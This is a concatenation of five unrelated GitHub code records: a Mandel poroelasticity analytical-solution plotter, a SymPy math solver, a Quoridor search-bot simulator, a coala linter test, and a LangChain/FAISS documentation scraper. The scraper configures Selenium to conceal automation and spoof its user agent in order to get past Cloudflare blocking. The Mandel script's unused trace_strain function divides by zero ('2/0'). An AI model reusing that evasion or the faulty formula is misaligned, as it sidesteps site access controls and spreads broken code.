2\n\nzmax = 1.0\nzmin = 0.0\nymax = 1.0\nymin = 0.0\nxmax = 10.0\nxmin = 0.0\nP_0 = 1.0\n\nM = 1.0 / ( phi / K_fl + (alpha - phi) /K_sg)\nK_u = K_d + alpha*alpha*M\nnu = (3*K_d - 2*G) / (2*(3*K_d + G))\nnu_u = (3*K_u - 2*G) / (2*(3*K_u + G))\nkappa = k / mu_f\na = (xmax - xmin)\nb = (ymax - ymin)\n#c = ( (2*kappa*G) * (1 - nu) * (nu_u - nu) ) / (alpha*alpha * (1 - 2*nu) * (1 - nu) )\nB_alt = (3 * (nu_u - nu) )/(alpha*(1-2*nu)*(1+nu_u))\nB = (alpha*M) / (K_d + alpha*alpha*M) #\nA_1 = 3 / (B * (1 + nu_u))\nA_2 = (alpha * (1 - 2*nu))/(1 - nu)\n\nE = 2.0*G*(1.0 + nu)\n\nE_x = E\nE_z = E\nalpha_1 = alpha\nalpha_3 = alpha\nnu_zx = nu\nnu_yx = nu\nG_xz = G\nkappa_x = kappa\n\nM_11 = ( E_x*(E_z - E_x * nu_zx**2) ) / ( (1 + nu_yx)*(E_z - E_z*nu_yx - 2*E_x * nu_zx**2) )\nM_12 = ( E_x*(nu_yx*E_z + E_x * nu_zx**2) ) / ( (1 + nu_yx)*(E_z - E_z*nu_yx - 2*E_x * nu_zx**2) )\nM_13 = ( E_x*E_z*nu_zx ) / ( E_z - E_z*nu_yx - 2*E_x * nu_zx**2 )\nM_33 = ( E_z**2 * (1 - nu_yx) ) / (E_z - E_z*nu_yx - 2*E_x * nu_zx**2) \nM_55 = G_xz\n\nA_1 = (alpha_1**2 * M_33 - 2*alpha_1*alpha_3*M_13 + alpha_3**2 * M_11)/(alpha_3*M_11 - alpha_1*M_13) + (M_11*M_33 - M_13**2)/(M * (alpha_3*M_11 - alpha_1*M_13) )\nA_2 = (alpha_3*M_11 - alpha_1*M_13) / M_11\n\nc_x = (kappa_x*M*M_11)/(M_11 + alpha_1*alpha_1*M)\nB_prime = 
(alpha*M)/(K_d + alpha*alpha*M)\n\nK_v = 2.*G*( (1.-nu) / (1.-2.*nu) )\nc_f = kappa*M*( K_v / (K_v + alpha*alpha*M) )\nc = kappa*M*( K_v / (K_v + alpha*alpha*M) )\n# ==============================================================================\ndef mandelZeros():\n \"\"\"\n Compute roots for analytical mandel problem solutions\n \"\"\"\n zeroArray = np.zeros(ITERATIONS)\n\n for i in np.arange(1, ITERATIONS+1,1):\n a1 = (i - 1.0) * np.pi * np.pi / 4.0 + EPS\n a2 = a1 + np.pi / 2\n am = a1\n for j in np.arange(0, ITERATIONS,1):\n y1 = np.tan(a1) - ((1.0 - nu) / (nu_u - nu))*a1\n y2 = np.tan(a2) - ((1.0 - nu) / (nu_u - nu))*a2\n am = (a1 + a2) / 2.0\n ym = np.tan(am) - (1 - nu) / (nu_u - nu)*am\n if ((ym*y1) > 0):\n a1 = am\n else:\n a2 = am\n if (np.abs(y2) < EPS):\n am = a2\n zeroArray[i-1] = am\n return zeroArray\n\ndef displacement(locs,tsteps,zeroArray):\n \"\"\"\n Compute displacement field at locations.\n \"\"\"\n (npts, dim) = locs.shape\n ntpts = tsteps.shape[0]\n displacement = np.zeros((ntpts, npts, dim), dtype=np.float64)\n x = locs[:,0]\n z = locs[:,1]\n t_track = 0\n# zeroArray = mandelZeros()\n\n for t in tsteps:\n# A_x = 0.0\n# B_x = 0.0\n# A_z = 0.0\n\n A_x = np.sum( (np.sin(zeroArray)*np.cos(zeroArray) / (zeroArray - np.sin(zeroArray)*np.cos(zeroArray))) * np.exp( -1.0*(zeroArray*zeroArray*c*t)/(a*a) ) )\n B_x = np.sum((np.cos(zeroArray) / (zeroArray - np.sin(zeroArray)*np.cos(zeroArray))) * np.sin( (zeroArray*x.reshape([x.size,1]))/a) \\\n * np.exp(-1.0*(zeroArray*zeroArray*c*t)/(a*a)),axis=1)\n A_z = np.sum( (np.sin(zeroArray)*np.cos(zeroArray) / (zeroArray - np.sin(zeroArray)*np.cos(zeroArray)))*np.exp( -1.0*(zeroArray*zeroArray*c*t)/(a*a) ) )\n\n\n #for n in np.arange(1,ITERATIONS+1,1):\n# a_n = zeroArray[n-1]\n\n #A_x += (np.sin(a_n)*np.cos(a_n) / (a_n - np.sin(a_n)*np.cos(a_n)))*np.exp(-1.0*(a_n*a_n*c_x*t)/(a*a))\n #B_x += (np.cos(a_n) / (a_n - np.sin(a_n)*np.cos(a_n))) * np.sin( (a_n*x)/a) * np.exp(-1.0*(a_n*a_n*c_x*t)/(a*a))\n \n #A_z += (np.sin(a_n)*np.cos(a_n) / (a_n - np.sin(a_n)*np.cos(a_n)))*np.exp(-1.0*(a_n*a_n*c*t)/(a*a))\n\n# A_x += (np.sin(a_n)*np.cos(a_n) / (a_n - np.sin(a_n)*np.cos(a_n))) * np.exp( -1.0*(a_n*a_n*c_f*t)/(a*a) )\n# B_x += (np.cos(a_n) / (a_n - np.sin(a_n)*np.cos(a_n))) * np.sin( (a_n*x)/a ) * np.exp( -1.0*(a_n*a_n*c_f*t)/(a*a) )\n \n# A_z += (np.sin(a_n)*np.cos(a_n) / (a_n - np.sin(a_n)*np.cos(a_n)))*np.exp( -1.0*(a_n*a_n*c_f*t)/(a*a) )\n \n# print('t = ', t, ' A_x= ', A_x)\n# print('t = ', t, ' B_x= ', B_x)\n# print('t = ', t, ' A_z= ', A_z) \n\n # Isotropic Formulation\n# displacement[t_track,:,0] = ( (F*nu)/(2.*G*a) - (F*nu_u)/(G*a) * A_x )*x + (F/G)*B_x\n# displacement[t_track,:,1] = ( -(F*(1.-nu))/(2.*G*a) + (F*(1-nu_u))/(G*a) * A_z )*z\n\n # Orthotropic Formulation\n displacement[t_track,:,0] = (F/a * M_13/(M_11*M_33 - M_13*M_13) - (2.*F)/a * (alpha_1*alpha_3*M + M_13)/(A_1*M*(alpha_3*M_11 - alpha_1*M_13))*A_x)*x + (2.*F*alpha_1)/(A_2*M_11) * B_x\n displacement[t_track,:,1] = (-F/a)*(M_11/(M_11*M_33 - M_13*M_13)) * (1.0 + 2.0*(A_2/A_1 - 1.0) * A_z)*z\n t_track += 1\n\n return displacement\n\ndef pressure(locs, tsteps, zeroArray):\n \"\"\"\n Compute pressure field at locations.\n \"\"\"\n (npts, dim) = locs.shape\n ntpts = tsteps.shape[0]\n pressure = np.zeros((ntpts, npts), dtype=np.float64)\n x = locs[:,0]\n z = locs[:,1]\n t_track = 0\n# zeroArray = mandelZeros()\n p_0 = (1./(3.*a))*B*(1+nu_u)*F\n for t in tsteps:\n p = np.sum( np.sin(zeroArray)/(zeroArray - np.sin(zeroArray)*np.cos(zeroArray)) * (np.cos( 
(zeroArray*x.reshape([x.size,1]))/a) \\\n - np.cos(zeroArray))*np.exp(-1.0*(zeroArray*zeroArray*c*t)/(a*a)), axis=1 )\n \n# if t == 0.0:\n# pressure[t_track,:] = (1./(3.*a))*(B*(1.+nu_u))*F\n# else:\n# p = np.sum( (np.sin(zeroArray) / (zeroArray - np.sin(zeroArray)*np.cos(zeroArray))) \\\n# * (np.cos( (zeroArray*x.reshape([x.size,1])) / a) - np.cos(zeroArray)) * np.exp(-1.0*(zeroArray*zeroArray * c_x * t)/(a*a)), axis=1 )\n# p = 0.0\n# for n in np.arange(1, ITERATIONS+1,1):\n# x_n = zeroArray[n-1]\n# p += (np.sin(x_n) / (x_n - np.sin(x_n)*np.cos(x_n))) * (np.cos( (x_n*x) / a) - np.cos(x_n)) * np.exp(-1.0*(x_n*x_n * c_x * t)/(a*a))\n# pressure[t_track,:] = (2.*F)/(a*A_1) * p\n\n # Isotropic Formulation\n# pressure[t_track,:] = 2.0*p_0 * p\n \n # Orthotropic Formulation\n pressure[t_track,:] = (2.*F)/(a*A_1) * p \n t_track += 1\n\n return pressure\n\ndef trace_strain(locs, tsteps, zeroArray):\n \"\"\"\n Compute trace strain field at locations.\n \"\"\"\n (npts, dim) = locs.shape\n ntpts = tsteps.shape[0]\n trace_strain = np.zeros((ntpts, npts), dtype=np.float64)\n x = locs[:,0]\n z = locs[:,1]\n t_track = 0\n# zeroArray = mandelZeros()\n\n for t in tsteps:\n\n eps_A = 0.0\n eps_B = 0.0\n eps_C = 0.0\n\n for i in np.arange(1, ITERATIONS+1,1):\n x_n = zeroArray[i-1]\n eps_A += (x_n * np.exp( (-1.0*x_n*x_n*c*t)/(a*a)) * np.cos(x_n)*np.cos( (x_n*x)/a)) / (a * (x_n - np.sin(x_n)*np.cos(x_n)))\n eps_B += ( np.exp( (-1.0*x_n*x_n*c*t)/(a*a)) * np.sin(x_n)*np.cos(x_n)) / (x_n - np.sin(x_n)*np.cos(x_n))\n eps_C += ( np.exp( (-1.0*x_n*x_n*c*t)/(x_n*x_n)) * np.sin(x_n)*np.cos(x_n)) / (x_n - np.sin(x_n)*np.cos(x_n))\n\n trace_strain[t_track,:] = (F/G)*eps_A + ( (F*nu)/(2.0*G*a)) - eps_B/(G*a) - (F*(1.0-nu))/(2/0*G*a) + eps_C/(G*a)\n t_track += 1\n\n return trace_strain\n\n\n# ==============================================================================\nf = h5py.File('./output/mandel_quad-domain.h5','r')\n\nt = f['time'][:]\nt = t.ravel()\n\nU = f['vertex_fields/displacement'][:]\nP = f['vertex_fields/pressure'][:]\nS = f['vertex_fields/trace_strain'][:]\n\npos = f['geometry/vertices'][:]\n\nzeroArray = mandelZeros()\nU_exact = displacement(pos, t, zeroArray)\nP_exact = np.reshape(pressure(pos, t, zeroArray),[t.shape[0],pos.shape[0],1])\n#S_exact = trace_strain(pos, t)\n\n# Graph time snapshots\nt_steps = t.ravel()\nt_step_array = np.linspace(0,t_steps.size,5).astype(np.int)\nt_step_array[0] += 2\nt_step_array[-1] -= 1\n#t_step_array = np.array([5, 10, 20, 25, 30])\n\nt_N = c*t / (a*a)\nP_N = (a*P) / F\n\nU_N = U.copy()\nU_N[:,:,0] = U[:,:,0] / a\nU_N[:,:,1] = U[:,:,1] / b\n\nP_exact_N = (a*P_exact) / F\n\nU_exact_N = U_exact.copy()\nU_exact_N[:,:,0] = U_exact[:,:,0] / a\nU_exact_N[:,:,1] = U_exact[:,:,1] / b\n\npos_N = pos.copy()\npos_N[:,0] = pos[:,0] / a\npos_N[:,1] = pos[:,1] / b\n\n# Zero Lines\nx_zero_row = np.flatnonzero(pos_N[:,0]==0)\nx_zero_pos = np.zeros([x_zero_row.size,3])\nx_zero_pos[:,:2] = pos[x_zero_row]\nx_zero_pos[:,2] = x_zero_row\nx_zero_pos = x_zero_pos[x_zero_pos[:,1].argsort()][:,2]\nx_zero_pos = x_zero_pos.astype(np.int)\n\nz_zero_row = np.flatnonzero(pos_N[:,1]==0)\nz_zero_pos = np.zeros([z_zero_row.size,3])\nz_zero_pos[:,:2] = pos[z_zero_row]\nz_zero_pos[:,2] = z_zero_row\nz_zero_pos = z_zero_pos[z_zero_pos[:,0].argsort()][:,2]\nz_zero_pos = z_zero_pos.astype(np.int)\n\n# Initial Conditions\nU_initial = U[0,:,:].copy()\n\nU_initial[:,0] = (F*nu_u*pos[:,0])/(2.*G*a)\nU_initial[:,1] = -(F*(1.-nu_u)*pos[:,1])/(2.*G*a)\n\nU_final = U[-1,:,:].copy()\n\nU_final[:,0] = 
(F*nu*pos[:,0])/(2.*G*a)\nU_final[:,1] = -(F*(1.-nu)*pos[:,1])/(2.*G*a)\n\nP_initial = P[0,:].copy()\nP_initial[:] = 1./(3.*a) * B * (1. + nu_u) * F\n\nP_final = P[-1,:].copy()\nP_final[:] = 1./(3.*a) * B * (1. + nu) * F\n\ncm_numeric = ['red','orange','green','blue','indigo', 'violet']\ncm_analytic = ['red','orange','green','blue','indigo', 'violet']\n\n# ==============================================================================\n# Generate Analytical Solution Plots\n# ==============================================================================\n\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\nimport numpy as np\n\nX = pos.copy()[:,0]\nY = pos.copy()[:,1]\nX_N = pos_N.copy()[:,0]\nY_N = pos_N.copy()[:,1]\n\n\n\ny_pos = np.where(Y == ymax)[0]\nx_pos = np.where(X == xmax)[0]\nx_fig = X[y_pos]\ny_fig = Y[x_pos]\nx_fig, tx_fig = np.meshgrid(x_fig, t)\ny_fig, ty_fig = np.meshgrid(y_fig, t)\n\n# Analytical Pressure\nfig = plt.figure()\nfig.set_size_inches(15,10)\nax = fig.gca(projection='3d')\n\nsurf_pressure = ax.plot_surface(x_fig, tx_fig, P_exact[:,y_pos,0], cmap=cm.coolwarm, rcount=500, ccount=500)\nfig.colorbar(surf_pressure, shrink=0.5, aspect=5)\n\nax.set_xlabel('Distance, m')\nax.set_ylabel('Time, s')\nax.set_zlabel('Pressure, Pa')\nax.set_title(\"Analytical Pressure Along X Axis\")\n\nfor angle in range(0, 360):\n ax.view_init(30, angle)\n plt.draw()\n print_angle = \"{0:0=3d}\".format(angle)\n savename = 'output/mandel_analytical_pressure_x_' + print_angle + '.png'\n fig.savefig(savename,dpi = 300) \n plt.pause(.00001)\n\n#ax.view_init(elev=30., azim=35)\n#plt.show()\n\n# Numerical Pressure\n\nfig = plt.figure()\nfig.set_size_inches(15,10)\nax = fig.gca(projection='3d')\n\nsurf_pressure = ax.plot_surface(x_fig, tx_fig, P[:,y_pos,0], cmap=cm.coolwarm, rcount=500, ccount=500)\nfig.colorbar(surf_pressure, shrink=0.5, aspect=5)\n\nax.set_xlabel('Distance, m')\nax.set_ylabel('Time, s')\nax.set_zlabel('Pressure, Pa')\nax.set_title(\"Numerical Pressure Along X Axis\")\n\n\nfor angle in range(0, 360):\n ax.view_init(30, angle)\n plt.draw()\n print_angle = \"{0:0=3d}\".format(angle)\n savename = 'output/mandel_numerical_pressure_x_' + print_angle + '.png'\n fig.savefig(savename,dpi = 300) \n plt.pause(.00001)\n\n\n\n","repo_name":"rwalkerlewis/pylith_examples","sub_path":"poroelasticity/mandel/mandel_analytical.py","file_name":"mandel_analytical.py","file_ext":"py","file_size_in_byte":11684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"26385718143","text":"import sympy\r\nfrom sympy import symbols, Eq, solve, Integral, Derivative, Matrix, lambdify\r\nfrom sympy.plotting import plot\r\n\r\n# Dictionary to store previously solved problems\r\nprev_problems = {}\r\n\r\n#Define function for solving problems\r\ndef solve_problem(problem_str):\r\n problem_str = problem_str.replace(\" \", \"\")\r\n # Check if the problem has been solved before\r\n if problem_str in prev_problems:\r\n return prev_problems[problem_str]\r\n\r\n # Check if the problem is an equation\r\n if \"=\" in problem_str:\r\n # Parse the equation\r\n left, right = problem_str.split(\"=\")\r\n expr = sympy.parsing.sympy_parser.parse_expr(left) - sympy.parsing.sympy_parser.parse_expr(right)\r\n\r\n # Solve the equation\r\n solutions = solve(expr, symbols('x'))\r\n\r\n # If the left-hand side was not zero, add the right-hand side to the 
solutions\r\n if left != str(solutions[0]):\r\n solutions = [sol + sympy.parsing.sympy_parser.parse_expr(right) for sol in solutions]\r\n\r\n # Check if the problem is a system of equations\r\n elif 'system' in problem_str:\r\n eqns = problem_str.split(',')\r\n eqns = [sympy.parsing.sympy_parser.parse_expr(eqn) for eqn in eqns]\r\n vars = []\r\n for eqn in eqns:\r\n vars += list(eqn.free_symbols)\r\n vars = sorted(set(vars), key=lambda var: str(var))\r\n solutions = sympy.solve(eqns, vars)\r\n\r\n # Check if the problem is a polynomial equation\r\n elif 'polynomial' in problem_str:\r\n expr = sympy.parsing.sympy_parser.parse_expr(problem_str.replace('polynomial', ''))\r\n solutions = sympy.roots(expr, multiple=True)\r\n \r\n # Check if the problem is a derivative\r\n elif 'derivative' in problem_str:\r\n expr, x, a = problem_str.split(',')\r\n expr = sympy.parsing.sympy_parser.parse_expr(expr)\r\n a = float(a)\r\n solutions = sympy.diff(expr, symbols(x)).subs(x, a)\r\n\r\n # Check if the problem is an integral\r\n elif 'integral' in problem_str:\r\n expr, x, a, b = problem_str.split(',')\r\n expr = sympy.parsing.sympy_parser.parse_expr(expr)\r\n a = float(a)\r\n b = float(b)\r\n solutions = sympy.integrate(expr, (symbols(x), a, b))\r\n \r\n # Check if the problem is a Fourier series\r\n elif 'fourier series' in problem_str:\r\n expr, x, a, b = problem_str.split(',')\r\n expr = sympy.parsing.sympy_parser.parse_expr(expr)\r\n a = float(a)\r\n b = float(b)\r\n period = b - a\r\n fs = sympy.fourier_series(expr, (symbols(x), a, b))\r\n solutions = fs.truncate(n=5)\r\n\r\n # Check if the problem is a partial differential equation\r\n elif 'heat equation' in problem_str:\r\n x, y, t = symbols('x y t')\r\n u = sympy.Function('u')(x, y, t)\r\n k = symbols('k')\r\n eq = Eq(sympy.diff(u, t) - k*(sympy.diff(u, x, x) + sympy.diff(u, y, y)), 0)\r\n solutions = sympy.pde.pdsolve(eq)\r\n\r\n else:\r\n # Parse the problem into a SymPy expression\r\n expr = sympy.parsing.sympy_parser.parse_expr(problem_str)\r\n\r\n # Solve the problem by simplifying the expression\r\n solutions = sympy.simplify(expr)\r\n\r\n\r\n # Check for additional functionality\r\n if 'sin' in problem_str or 'cos' in problem_str:\r\n solutions = sympy.solveset(expr, symbols('x'))\r\n elif 'tan' in problem_str:\r\n expr = sympy.parsing.sympy_parser.parse_expr(problem_str)\r\n solutions = sympy.simplify(expr)\r\n \r\n elif 'limit' in problem_str:\r\n expr, x, a = problem_str.split(',')\r\n expr = sympy.parsing.sympy_parser.parse_expr(expr)\r\n a = float(a)\r\n solutions = sympy.limit(expr, symbols(x), a)\r\n \r\n elif 'second derivative' in problem_str:\r\n expr = problem_str.replace('second derivative of ', '')\r\n expr = sympy.parsing.sympy_parser.parse_expr(expr)\r\n solutions = sympy.diff(expr, symbols('x'), 2)\r\n \r\n elif 'heat equation' in problem_str:\r\n u = sympy.Function('u')(symbols('x'), symbols('y'))\r\n eq = sympy.Eq(sympy.diff(u, symbols('x'), symbols('x')) + sympy.diff(u, symbols('y'), symbols('y')), 0)\r\n solutions = sympy.pde.pdsolve(eq)\r\n \r\n # Check if the problem is a second-order differential equation\r\n elif 'second order differential equation' in problem_str:\r\n # Parse the equation\r\n expr, x = symbols('y'), symbols('x')\r\n y = sympy.Function('y')(x)\r\n eq = sympy.Eq(sympy.diff(y, x, x) + 2*sympy.diff(y, x) + 5*y, 0)\r\n solutions = sympy.dsolve(eq)\r\n \r\n # Check if the problem is a partial differential equation with more than two variables\r\n elif 'wave equation' in problem_str:\r\n x, y, z, t = 
symbols('x y z t')\r\n u = sympy.Function('u')(x, y, z, t)\r\n eq = Eq(sympy.diff(u, t, t) - sympy.diff(u, x, x) - sympy.diff(u, y, y) - sympy.diff(u, z, z), 0)\r\n solutions = sympy.pde.pdsolve(eq)\r\n \r\n elif 'plot' in problem_str:\r\n # Parse the function and plot\r\n expr = sympy.parsing.sympy_parser.parse_expr(problem_str.replace('plot ', ''))\r\n p = plot(expr, show=False)\r\n p.show()\r\n return \"Graph displayed.\"\r\n \r\n elif 'numeric' in problem_str:\r\n # Parse the function, convert to a lambda function, and evaluate numerically\r\n expr = sympy.parsing.sympy_parser.parse_expr(problem_str.replace('numeric ', ''))\r\n f = lambdify(x, expr)\r\n a, b = [float(x) for x in input(\"Enter the start and end points: \").split()]\r\n n = int(input(\"Enter the number of steps: \"))\r\n x_vals = [a + i*(b-a)/n for i in range(n+1)]\r\n y_vals = [f(x) for x in x_vals]\r\n p = plot(expr, (x, a, b), show=False)\r\n p.scatter(x_vals, y_vals)\r\n p.show()\r\n return \"Graph displayed.\"\r\n else:\r\n pass\r\n\r\n\r\n # Store the solution in the previous problems dictionary\r\n prev_problems[problem_str] = solutions\r\n\r\n # Return the solution(s) to the user\r\n return solutions\r\n\r\n# Main loop\r\nwhile True:\r\n # Get user input\r\n user_input = input(\"Enter a mathematical problem: \")\r\n\r\n # Check if the problem has already been solved\r\n if user_input in prev_problems:\r\n print(f\"Result (from history): {prev_problems[user_input]}\")\r\n continue\r\n\r\n # Try to solve the problem\r\n try:\r\n solutions = solve_problem(user_input)\r\n print(f\"Result: {solutions}\")\r\n except:\r\n print(\"Error: Could not solve the problem.\")\r\n","repo_name":"NtloyiyaOkuhle/HackMathsWeb","sub_path":"HackMaths/HackMaths.py","file_name":"HackMaths.py","file_ext":"py","file_size_in_byte":6522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"6342727200","text":"from GameFlow import Board, BoardTerminalTest, FenceChecker, MoveChecker\nfrom Search import DLAlphaBetaSearch, MinimaxSearch, AlphaBetaSearch, DLMinimaxSearch\nfrom Core import Player\nfrom Heuristics import ShortestPathHeuristic\nfrom copy import deepcopy\nfrom UIKit import UIBoard\n\nclass Versus:\n \"\"\"Simulator for two bots playing against each other\"\"\"\n def __init__(self, max_depth_level: int, min_depth_level: int, grid_size: int):\n self.max_depth_level = max_depth_level\n self.min_depth_level = min_depth_level\n self.grid_size = grid_size\n \n fence_checker = FenceChecker(fence_length=2, should_check_for_obscured_path = True)\n move_checker = MoveChecker()\n self.board = Board(fence_checker, move_checker, self.grid_size)\n self.terminal_test = BoardTerminalTest()\n self.visit_count = {}\n\n def start(self) -> None:\n \"\"\"Begin the simulation\"\"\"\n tmp_board = deepcopy(self.board)\n\n heuristic = ShortestPathHeuristic()\n \n while not self.terminal_test.is_terminal(tmp_board):\n\n UIBoard.print_board(tmp_board)\n\n if tmp_board.current_player == Player.MAX:\n \n max_search: DLAlphaBetaSearch = DLAlphaBetaSearch(\n depth = self.max_depth_level,\n heuristic = heuristic, \n visit_count = self.visit_count\n )\n max_strategy = max_search.find_strategy(tmp_board, self.terminal_test)\n \n max_best_action = max_strategy.get(tmp_board)\n tmp_board = tmp_board.get_action_result(max_best_action)\n \n continue\n else:\n \n min_search: DLAlphaBetaSearch = DLAlphaBetaSearch(\n depth = self.min_depth_level,\n heuristic = heuristic,\n visit_count = self.visit_count\n )\n 
min_strategy = min_search.find_strategy(tmp_board, self.terminal_test) \n \n min_best_action = min_strategy.get(tmp_board)\n tmp_board = tmp_board.get_action_result(min_best_action)\n continue\n \n\n print(self.terminal_test.utility(tmp_board))\n","repo_name":"PetrosTepoyan/AI-Group-Project","sub_path":"GameFlow/Versus.py","file_name":"Versus.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"12768983960","text":"import logging\nfrom queue import Queue\n\nfrom bears.general.LineContinuationBear import LineContinuationBear\nfrom coalib.testing.LocalBearTestHelper import LocalBearTestHelper\nfrom coalib.testing.LocalBearTestHelper import execute_bear\nfrom coalib.results.Result import Result\nfrom coalib.settings.Section import Section\nfrom coalib.settings.Setting import Setting\n\n\ngood_file = \"\"\"\na = some_function(\n '1' + '2')\n\ndef fun():\n '''\n >>> from math \\\\\n ... import pow\n '''\n\"\"\"\n\n\nclass LineContinuationBearTest(LocalBearTestHelper):\n\n def setUp(self):\n self.section = Section('name')\n self.uut = LineContinuationBear(self.section, Queue())\n\n def test_good_file(self):\n self.section.append(Setting('language', 'Python'))\n self.check_validity(self.uut, good_file.splitlines())\n\n def test_bad_file(self):\n self.section.append(Setting('language', 'Python'))\n self.check_results(\n self.uut, ['a = 1 + \\\\', '2'],\n [Result.from_values('LineContinuationBear',\n 'Explicit line continuation is not allowed.',\n line=1, column=9, end_line=1, end_column=10,\n file='default')],\n filename='default')\n\n def test_lang_exception(self):\n self.section.append(Setting('language', 'BlaBlaBla'))\n ERROR_MESSAGE = 'ERROR:root:Language BlaBlaBla is not yet supported.'\n logger = logging.getLogger()\n\n with self.assertLogs(logger, 'ERROR') as log:\n with execute_bear(self.uut, filename='F', file='') as result:\n self.assertEqual(len(log.output), 1)\n self.assertEqual(log.output[0], ERROR_MESSAGE)\n","repo_name":"coala/coala-bears","sub_path":"tests/general/LineContinuationBearTest.py","file_name":"LineContinuationBearTest.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":292,"dataset":"github-code","pt":"23"} +{"seq_id":"72332389498","text":"import os\nimport re\nimport numpy as np\nimport pandas as pd\nfrom time import sleep\nfrom numpy import random\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support.ui import WebDriverWait \nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom concurrent.futures import ThreadPoolExecutor\nfrom langchain.text_splitter import CharacterTextSplitter\nfrom langchain.embeddings.openai import OpenAIEmbeddings\nfrom langchain.vectorstores.faiss import FAISS\nfrom langchain.docstore.document import Document\n\n\n# OPENAI api key\nos.environ['OPENAI_API_KEY'] = 'XXXXXXXXXXXXXXXX'\n# base url that will be recursively checked\nSTART_URL = 'https://support.optimizely.com/'\n# filter for specific URLs - use START_URL is no additional URL is needed\nFILTER_URLS = 'https://support.optimizely.com/hc/en-us/'\n# HTML class that contains the text in the URLs \nCLASS_HTML = 'lg:pl-5'\n# output from linkchecker\nOUTPUT_URLS = 'log_urls.csv'\n# FAISS vector database name\nOUTPUT_INDEX = 'faiss_search_index'\n# final text and URL pairs - 
optional\nOUTPUT_SOUP = 'final_soup.csv'\n# only 1 thread is used here as Cloudflare was blocking more\nWORKERS = 1\n\n\ndef scrape_docs(start_url, output_urls):\n '''\n Use linkchecker to recursiverly get all URL associated with the start_url\n Depth (parameter r) is here set to 2 levels\n '''\n\n try:\n os.system(f'linkchecker --r=2 --timeout=10 --threads=100 --no-warnings --output csv {start_url} > {output_urls}')\n except:\n print('Cannot scrape docs')\n\n\ndef load_output(output_urls, filter_urls):\n '''\n Load urls from linkchecker to be cleaned\n '''\n\n # ignore last summary row and first 3 lines of header\n df = pd.read_csv(output_urls, sep=';', skipfooter=1, skiprows=3, engine='python')\n # remove unnecessary urls\n df = df.tail(-2)\n # drop any duplicates\n df = df.drop_duplicates(subset=['urlname'])\n urls = df['urlname']\n # return only specific urlnames\n urls = urls[urls.str.contains(filter_urls)]\n\n return urls\n\n\ndef get_driver():\n ''''\n Create Chrome Driver with options for automation\n '''\n\n chrome_options = Options()\n chrome_options.add_argument(\"--window-size=1920,1080\")\n chrome_options.add_experimental_option(\"excludeSwitches\", [\"enable-automation\"])\n chrome_options.add_experimental_option('useAutomationExtension', False)\n chrome_options.add_argument(\"--enable-javascript\")\n chrome_options.add_argument(\"--start-maximized\")\n chrome_options.add_argument(\"--nogpu\")\n chrome_options.add_argument(\"--headless=false\")\n chrome_options.add_argument('--disable-blink-features=AutomationControlled')\n chrome_options.add_argument('--user-agent=\"Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Microsoft; Lumia 640 XL LTE) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.10166')\n\n driver = webdriver.Chrome(options=chrome_options)\n\n return driver\n\n\ndef split_urls(file, workers):\n '''\n Split url list to be split for workers\n '''\n\n N = workers\n filenames = []\n for i, file in enumerate(np.array_split(file, N)):\n filename = f\"urls_{i + 1}.csv\"\n filenames.append(filename)\n file.to_csv(filename, index=False)\n\n return filenames\n\n\ndef get_handles(filename, driver):\n '''\n Get text elements, extract class_html from there, and clean spaces\n '''\n\n df = pd.read_csv(filename)\n\n soups = []\n for _, row in df.iterrows():\n try:\n url = row['urlname']\n driver.get(url)\n element_present = EC.presence_of_element_located((By.ID, 'page-container'))\n # wait 5 seconds at most to get element present\n WebDriverWait(driver, 5).until(element_present)\n # small random sleep to avoid large bursts of access\n sleep(random.uniform(1, 3))\n soup = BeautifulSoup(driver.page_source,\"lxml\")\n body_soup = soup.find(\"div\", {\"class\": CLASS_HTML})\n clean_soup = re.sub(\"\\s\\s+\", \" \", body_soup.get_text())\n soups.append([clean_soup, url])\n except Exception:\n continue\n\n df_soup = pd.DataFrame(soups, columns=[\"page_content\", \"source\"])\n df_soup.to_csv(filename.replace('urls', 'soups'), index = False)\n\n\ndef save_workers(filenames, output_soup_file):\n '''\n Save text elements from each worker\n '''\n\n dfs = [pd.read_csv(f.replace('urls', 'soups')) for f in filenames]\n # Combine the list of dataframes\n df = pd.concat(dfs, ignore_index=True)\n # save df to csv\n df.to_csv(f'{output_soup_file}', index = False)\n\n return df\n\n\ndef setup_workers(list_urls):\n '''\n Setup pool of threads\n '''\n\n files = split_urls(list_urls, WORKERS)\n drivers = [get_driver() for _ in range(WORKERS)]\n\n with 
ThreadPoolExecutor(max_workers=WORKERS) as executor:\n executor.map(get_handles, files, drivers)\n\n [driver.quit() for driver in drivers]\n\n df = save_workers(files, OUTPUT_SOUP)\n\n return df\ndef save_search_index(df, output_index):\n '''\n Create embeddings and save search index\n '''\n\n source_chunks = []\n # chunks of a maximum size of 1000 characters; no overlap\n splitter = CharacterTextSplitter(separator=\" \", chunk_size=1000, chunk_overlap=0)\n\n sources = [Document(page_content=x, metadata={\"source\": y}) for x, y in zip(df['page_content'], df['source'])]\n for source in sources:\n for chunk in splitter.split_text(source.page_content):\n source_chunks.append(Document(page_content=chunk, metadata=source.metadata))\n\n search_index = FAISS.from_documents(source_chunks, OpenAIEmbeddings())\n\n search_index.save_local(output_index)\n\n\nif __name__ == \"__main__\":\n\n if not os.path.exists(OUTPUT_URLS):\n # run the scrape to get all links; skip if it exists\n scrape_docs(START_URL, OUTPUT_URLS)\n\n # clean output from linkcheck, get only url names\n urls = load_output(OUTPUT_URLS, FILTER_URLS)\n\n # get CLASS_HTML element from all links\n final_df = setup_workers(urls)\n\n # save search index\n save_search_index(final_df, 